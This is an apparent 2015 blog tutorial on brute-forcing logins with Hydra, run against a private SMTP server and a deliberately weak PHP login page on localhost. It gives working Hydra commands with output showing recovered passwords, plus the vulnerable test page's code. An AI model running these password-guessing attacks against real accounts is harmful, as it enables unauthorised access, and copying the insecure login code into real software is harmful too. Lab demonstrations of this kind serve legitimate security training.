Tuesday, September 15, 2015

brute force login of web and mail with hydra

** general information
smtp ip: 10.0.3.150
web ip: localhost
username list file: user.txt
password list file: pass.txt

1- installation
$ sudo  apt-get install hydra

2- brute force email account of user1@test.qq

$ hydra -l user1@test.qq -P pass.txt 10.0.3.150 smtp
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-09-15 11:06:46
[DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: 10.0.3.150   login: user1@test.qq   password: pass1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-09-15 11:06:49


 so we get the password pass1

3- brute force web form with the location in /login/index.php
***Simple web with login form to test (save it to /login with name index.php)***

<?php

$action=$_REQUEST['action'];
$show = true;
if ($action=="")    /* display the contact form */
    {
        if ($_POST){
            $user = $_POST['user'];
            $pass = $_POST['pass'];
            if ($user == "user1" && $pass== "pass1"){
                $msg = "login successful <br>";
                $show = false;
            }else{
                $msg = "wrong password <br>";
            }
         }
    }
    
?>

<html>
<head>
<title>Login form</title>
</head>
<body>
    <?php
        if ($show == false){
            echo '<a href="."> logout! </a>';
        }else{
           
         
            echo '<form method="post" action="index.php">';
            echo 'Username:<input type="text" size="12" maxlength="12" name="user"><br />';
            echo 'Password:<input type="password" size="12" maxlength="36" name="pass"><br />';
            echo $msg;
            echo '<input type="submit" name="login" value="Login">';
            echo '</form>';
  
        }
    ?>
</body>


**************************************************************************

$ hydra localhost http-form-post "/login/index.php:user=^USER^&pass=^PASS^:wrong password" -L user.txt -P pass.txt
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-09-15 11:10:52
[DATA] 16 tasks, 1 server, 77 login tries (l:11/p:7), ~4 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: user1   password: pass1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-09-15 11:10:52


so we get 1 correct username/password



No comments:

Post a Comment